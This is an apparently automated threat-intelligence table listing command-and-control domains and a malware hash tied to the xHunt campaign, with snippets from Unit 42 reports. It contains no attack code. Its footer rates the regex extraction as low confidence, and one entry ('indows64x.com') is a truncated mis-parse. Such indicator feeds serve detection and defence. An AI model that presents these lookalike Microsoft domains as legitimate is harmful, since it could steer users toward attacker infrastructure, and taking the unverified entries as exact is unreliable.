| domain | windows64x.com | 7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/19 Masked windows-updates[.]com 1/10/18 - | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | windows-updates.com | - 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/19 Masked windows-updates[.]com 1/10/18 - 1/10/19 Masked microsoft-check[.]com 10/10/18 - | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | winx64-microsoft.com | egistrant firewallsupports[.]com 5/6/2018 - 5/6/2019 Masked winx64-microsoft[.]com 7/15/18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19 | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 892d5e8e763073648dfebcfd4c89526989d909d6189826a974f17e2311de8bc4 | soka\\Hisoka\\obj\\Debug\\inetinfo.sys.pdb The file SHA256: 892d5e8e763073648dfebcfd4c89526989d909d6189826a974f17e2311de8bc4 was used in reference to the below analysis on Hisoka v0.8. | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | firewallsupports.com | hat communicated with the domains windows-updates[.]com and firewallsupports[.]com , respectively. We do not have telemetry to determine the | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | indows64x.com | observed one of these overlapping domains, specifically, w indows64x[.]com , being used as the C2 server for a new PowerShell based | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pasta58.com | unt campaign , we observed several domains with ties to the pasta58[.]com domain associated with known Sakabota command and control | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | windows64x.com | er 2019 we observed a host based in Kuwait beaconing to the windows64x[.]com domain using the same DNS tunneling protocol as the CASHY | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | windows-updates.com | HY200 PowerShell scripts that communicated with the domains windows-updates[.]com and firewallsupports[.]com , respectively. We do not have | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.